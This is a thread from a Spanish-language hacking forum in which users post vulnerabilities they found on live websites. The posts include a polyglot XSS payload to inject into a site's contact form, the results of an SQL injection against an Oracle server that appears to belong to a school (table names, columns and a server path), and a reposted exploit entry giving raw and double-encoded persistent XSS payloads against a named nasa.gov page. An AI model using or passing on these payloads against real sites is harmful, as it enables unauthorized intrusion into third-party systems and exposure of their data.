• Reporte de bugs en webs

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #367733  por Spectretronic
 11 May 2012, 03:40
Tiene un XSS

Solo tienes que injectar este codigo
en contacto en firefox brinca la alerta en google chorome no te la brica no es mentira cress que voy perder mi tiempo?

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 #372225  por s7evin
 07 Jun 2012, 17:21
adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD

[ Debe registrarse para ver este enlace ]
No estoy muy puesto en Java y menos en servlets... pero parece que intenta usar una variable de SESSION que no está definida ('matricula'). Así que para poder inyectar algo, deberías modificar el objeto de sesión, a lo cual mis conocimientos no llegan.. jeje según mi opinión, tal como tu comentas es 'inofensivo'.

Salu2!
 #372239  por KHC
 07 Jun 2012, 20:15
Pues paarte de darte un monton de informacion no le veo problema! Almenos que busques en la misma web donde puedas utilizar los datos para hacer un query!
 #372267  por MichBukana
 07 Jun 2012, 23:41
adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD

[ Debe registrarse para ver este enlace ]
Estuve mirando no solo en esa aplicacion, si no otras en ese servidor. y resulta que tiene una vulnerabilidad,
una inyeccion sql por POST pero parece que filtra las comillas simples poniendote otra seguida

es un servidor oracle y solo pude sacar esto a nivel web:
Oracle, Apache, windows

alumnos_sinconcluir
Matricula,nombre,total,ciclo

V_social
matricula, nombre, division, nombrediv, carrera, nombrecar, iciclo

D:\Archivos de programa\Apache Group\Apache2\htdocs\servicio_social\index.cfm

Salu2!
 #385607  por Ti0Sam
 24 Ago 2012, 01:44
Código: [ Debe registrarse para ver este enlace ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       : [email protected]
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:
 
http://img341.imageshack.us/img341/4395/snapshot408.png
 
http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
VULNERABILITY LOCATION:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
CROSS SITE SCRIPTING:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
HOW TO USE:
 
"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
 
so double encoded it will look like this:
 
%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
Enjoy!
 
# 1337day.com [2012-08-22]
 #387631  por s7evin
 07 Sep 2012, 12:01
Juder... que buena TioSam/CalebBucker xD
Estos de la Nasa no aprenden ni a base de tortas
 #391292  por sanko
 02 Oct 2012, 22:46
Ti0Sam escribió:Como quedan los gilipollas que hablan tras las espaldas

[ Debe registrarse para ver este enlace ]
h4x0r...
  • 1
  • 10
  • 11
  • 12
  • 13
  • 14